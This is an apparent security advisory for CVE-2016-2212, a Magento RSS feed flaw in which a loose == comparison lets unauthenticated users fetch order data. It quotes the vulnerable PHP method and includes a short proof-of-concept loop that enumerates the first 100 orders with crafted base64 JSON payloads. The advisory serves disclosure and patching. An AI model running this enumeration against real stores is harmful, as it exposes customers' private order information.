Magento <= (RSS Feed) Information Disclosure Vulnerability

• Software Link:

• Affected Versions:

Version and prior versions.

• Vulnerability Description:

The vulnerability is located in the /app/code/core/Mage/Rss/Helper/Order.php script, specifically into the getOrderByStatusUrlKey method of the Mage_Rss_Helper_Order class, which is the method being called when dispatching RSS feed requests:

    public function getOrderByStatusUrlKey($key)
        $data = json_decode(base64_decode($key), true);
        if (!is_array($data) || !isset($data['order_id']) || !isset($data['increment_id'])
            || !isset($data['customer_id'])
        ) {
            return null;

        /** @var $order Mage_Sales_Model_Order */
        $order = Mage::getModel('sales/order')->load($data['order_id']);
        if ($order->getId()
            && $order->getIncrementId() == $data['increment_id']
            && $order->getCustomerId() == $data['customer_id']
        ) {
            return $order;

        return null;

User input passed through the “data” request parameter is being base64-decoded and then JSON-decoded at line 85, and its “increment_id” and “customer_id” parameters are used to match the same values of the order object retrieved at line 93. After that, if everything is matched correctly, then the $order object will be returned by the getOrderByStatusUrlKey method for displaying within the RSS feed as XML data. The vulnerability exists because of an unsafe way of comparing those parameters, due to comparison operator == is being used instead of === within the “if” statement at lines 95-96. The latter operator returns “true” only if the compared values are equal and the same type, while the first compare the values after “type juggling”. Because of this behavior, a remote unauthenticated attacker might be able to download order comments and other order-related information by using a PHP script like the following, which will try to enumerate the details of the first 100 orders:

for ($i = 1; $i <= 100; $i++)
    print "[-] Retrieving order ID $i\n";

    $data = array('order_id' => $i, 'increment_id' => true, 'customer_id' => true);
    $data = base64_encode(json_encode($data));
    $_xml = http_get("http://[HOST]/magento/index.php/rss/order/status?data={$data}");

    print parse_magento_rss_order($_xml);

• Solution:

Update to a fixed version or apply the SUPEE-7405 patch bundle:

• Disclosure Timeline:

[29/10/2015] – Vendor notified
[29/10/2015] – Vendor response stating: “Thank you for your submission. We have logged ticket APPSEC-1171 to track this issue. We will reach out to you once our security engineers have validated this issue.”
[20/01/2016] – Version released along with the patch for this vulnerability
[26/01/2016] – CVE number requested
[01/02/2016] – Vendor response stating: “Congratulations! Your vulnerability report and proof of concept (APPSEC-1171 Information Disclosure in RSS feed) have been accepted and you will be receiving a bounty of USD $9,000.”
[02/02/2016] – CVE number assigned
[12/02/2016] – Bug bounty received
[23/02/2016] – Public disclosure

• CVE Reference:

The Common Vulnerabilities and Exposures project (
has assigned the name CVE-2016-2212 to this vulnerability.

• Credits:

Vulnerability discovered by Egidio Romano.